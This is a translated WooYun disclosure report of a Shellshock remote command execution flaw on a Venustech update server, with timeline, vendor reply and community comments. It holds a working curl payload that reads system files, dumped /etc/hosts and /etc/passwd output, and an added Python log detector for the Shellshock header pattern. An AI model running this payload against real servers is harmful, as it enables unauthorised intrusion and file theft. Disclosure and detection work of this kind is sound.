
Vulnerability summary

Defect ID: wooyun-2016-0170913

Title: A Venustech server has a remote command execution vulnerability

Vendor: Beijing Venustech Information Security Technology Co., Ltd. (北京启明星辰信息安全技术有限公司)

Author: 猪猪侠

Submitted: 2016-01-18 18:27

Fixed: 2016-03-05 09:52

Published: 2016-03-05 09:52

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-18: details sent to the vendor, awaiting vendor action
2016-01-20: vendor confirmed; details visible to the vendor only
2016-01-30: details disclosed to core white hats and domain experts
2016-02-09: details disclosed to regular white hats
2016-02-19: details disclosed to intern white hats
2016-03-05: details disclosed to the public

Brief description:

A Venustech server has a remote command execution vulnerability. The server has 4 network cards, configured with internal IP addresses on 7 class C subnets.

Detailed description:

#1 Server
https://updates.venustech.com.cn/
#2 Vulnerability description
Bash Shellshock vulnerability




Proof of vulnerability:

#3 Proof

curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost USAP
192.168.9.125 update.lyxtech.com




cat /etc/passwd 
admin:x:0:0:root:/usap/boot:/bin/bash
daemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologin
www:x:33:33:www:/usr/local/usap/center/web:/bin/nologin
sshd:x:74:74::/var/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
mysql:x:500:500::/home/mysql:/sbin/nologin


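The proof above works because Bash parses a request header that begins with a function definition (the Shellshock bug, CVE-2014-6271) when the CGI hands it over as an environment variable. As an added defensive example (not part of the original report), the following Python scans combined-format access-log lines, such as lighttpd's, for that header prefix; the log lines and the probe strings are constructed.

```python
import re
from typing import Dict, List

# Bash function-definition prefix that Shellshock relies on: "() {" at the
# start of a header value, optionally with whitespace before the brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined-format access log line (lighttpd/Apache):
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into named fields; {} if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def shellshock_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line whose User-Agent or Referer carries the prefix."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"host": rec["host"], "time": rec["time"],
                             "field": field, "request": rec["request"]})
                break
    return hits


# Constructed sample log lines (not from the report). The probes copy only the
# header shape used in the proof; the command part is a harmless echo.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2016:18:22:01 +0800] "GET /login.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '198.51.100.9 - - [18/Jan/2016:18:22:05 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Jan/2016:18:22:09 +0800] "GET /login.cgi HTTP/1.1" 200 512 "() { x;};echo" "curl/7.35.0"',
]

if __name__ == "__main__":
    for h in shellshock_hits(SAMPLE_LOG):
        print(f"{h['time']} {h['host']} via {h['field']}: {h['request']}")
```

Run it against a real access log by reading the file into a list and passing it to shellshock_hits; any hit against a CGI path on a host still running an unpatched Bash deserves the same "update or take it offline" response the report recommends.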

Fix recommendation:

Update it or take it offline

Copyright notice: please credit the source when republishing, 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2016-01-20 17:58

Vendor reply:

This is a third-party vendor's system that was in testing and had not been formally put into service. Testing confirmed that the issue exists; it has now been taken offline and we are working with the third-party vendor on a fix. Thanks to 猪猪侠.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-01-18 18:32 | qhwlpg ( Regular white hat | Rank:260 Vulns:63 | Focused on code auditing. )

    First!

  2. 2016-01-18 18:36 | 土夫子 ( Regular white hat | Rank:453 Vulns:80 | When all seems lost, a way will open )

    pa pa pa

  3. 2016-01-18 18:58 | 带馅儿馒头 Certified white hat ( Core white hat | Rank:1325 Vulns:150 | Heart in, dream in )

    Brother Zhu is awesome

  4. 2016-01-18 19:03 | SH0X8001 ( Passerby | Rank:25 Vulns:6 | Guess )

    Badass, badass, badass

  5. 2016-01-18 20:17 | 坏男孩-A_A ( Intern white hat | Rank:41 Vulns:17 | Learning in awe )

    666

  6. 2016-01-18 20:20 | k0_pwn ( Intern white hat | Rank:96 Vulns:13 | Focused and free )

    Brother Zhu, it's year-end, leave the programmers a way to live!

  7. 2016-01-18 21:04 | zeracker Certified white hat ( Regular white hat | Rank:1077 Vulns:139 | More WooYun, more opportunities! WeChat public account id:a301zls ...)

    Year-end...

  8. 2016-01-18 21:58 | getshell1993 Certified white hat ( Core white hat | Rank:898 Vulns:99 | ~!@#¥%……&*)

    Can't stop....

  9. 2016-01-18 22:17 | 毛毛虫 ( Regular white hat | Rank:143 Vulns:46 | Persistence->loneliness->solitude->blossom )

    Brother Zhu is just awesome!!!

  10. 2016-01-18 22:25 | Let a person cry. ( Intern white hat | Rank:31 Vulns:11 | xxoo )

    See, I was right: 猪猪侠 is on a year-end sprint, every major vendor gets hit once or more, and the programmers get overtime

  11. 2016-01-19 00:32 | 少宇 ( Passerby | Rank:18 Vulns:7 | Read more, practice more, chase more girls!! )

    It's almost year-end, can't we have a pleasant New Year!

  12. 2016-01-19 08:40 | luwikes ( Regular white hat | Rank:532 Vulns:79 | Studying hard~~~ )

    猪猪侠 did a simple test of the security of the major security vendors

  13. 2016-01-19 09:48 | 齐迹 ( Regular white hat | Rank:790 Vulns:103 | Hiring security engineers in Chongqing. sec.zbj.com welcomes... )

    Please come visit my site, 猪猪侠. >_<

  14. 2016-01-19 09:55 | 路人毛 ( Intern white hat | Rank:66 Vulns:27 | Please speak in Chinese. )

    The whole stockpile is coming out

  15. 2016-01-19 13:06 | 换个昵称 ( Passerby | Rank:9 Vulns:4 | 1 )

    If the year-end bonus is gone, are you going to pay for it?

  16. 2016-02-23 10:11 | BeenQuiver ( Regular white hat | Rank:103 Vulns:27 | Focused and efficient; never give up good habits )

    猪猪侠's scanner is really awesome

  17. 2016-02-25 15:19 | H.U.C-人 族 ( Passerby | Rank:9 Vulns:4 | Loves network security )

    Can I tag along?